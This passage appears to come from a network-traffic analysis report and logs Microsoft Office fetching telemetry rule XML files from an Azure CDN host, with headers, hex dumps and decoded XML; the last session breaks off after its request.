                                                                              Date: Sat, 26 Oct 2024 06:49:24 GMT
                                                                              Content-Type: text/plain
                                                                              Content-Length: 218853
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public
                                                                              Last-Modified: Wed, 23 Oct 2024 06:30:03 GMT
                                                                              ETag: "0x8DCF32C20D7262E"
                                                                              x-ms-request-id: 39f98116-901e-0015-0fb5-25b284000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064924Z-15b8d89586flzzks5bs37v2b9000000005y00000000048he
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:24 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                              2024-10-26 06:49:24 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                              Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                              2024-10-26 06:49:24 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                              Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                              2024-10-26 06:49:25 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                              Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                              2024-10-26 06:49:25 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                              Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                                              2024-10-26 06:49:25 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                              Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                              2024-10-26 06:49:25 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                              Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                              2024-10-26 06:49:25 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                              Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                                                                              2024-10-26 06:49:25 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                              2024-10-26 06:49:25 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                              Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              25192.168.2.44977913.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:26 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:26 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:26 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 450
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                              ETag: "0x8DC582BD4C869AE"
                                                                              x-ms-request-id: 9a0790d9-e01e-0052-7cad-26d9df000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064926Z-16849878b78hh85qc40uyr8sc800000001yg000000007qen
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:26 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              26192.168.2.44978213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:26 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:26 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:26 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 408
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                              ETag: "0x8DC582BB56D3AFB"
                                                                              x-ms-request-id: 31a53d7e-801e-00a3-74f7-217cfb000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064926Z-16849878b78wv88bk51myq5vxc00000001zg000000005nc9
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:26 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              27192.168.2.44978013.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:26 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:26 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:26 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 2980
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                              ETag: "0x8DC582BA80D96A1"
                                                                              x-ms-request-id: 1a9c8bfd-301e-0000-1fee-25eecc000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064926Z-15b8d89586f4zwgbgswvrvz4vs00000003000000000000xs
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:26 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              28192.168.2.44977813.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:26 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:26 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:26 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 3788
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                              ETag: "0x8DC582BAC2126A6"
                                                                              x-ms-request-id: 8bb6e00a-f01e-003c-3fef-248cf0000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064926Z-15b8d89586f989rkfw99rwd68g00000002ug000000009pau
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:26 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              29192.168.2.44978113.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:26 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:27 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:26 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 2160
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                              ETag: "0x8DC582BA3B95D81"
                                                                              x-ms-request-id: fc6998d3-101e-008d-52ad-2692e5000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064926Z-16849878b786lft2mu9uftf3y400000002xg000000009knu
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:27 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              30192.168.2.44978413.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:27 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
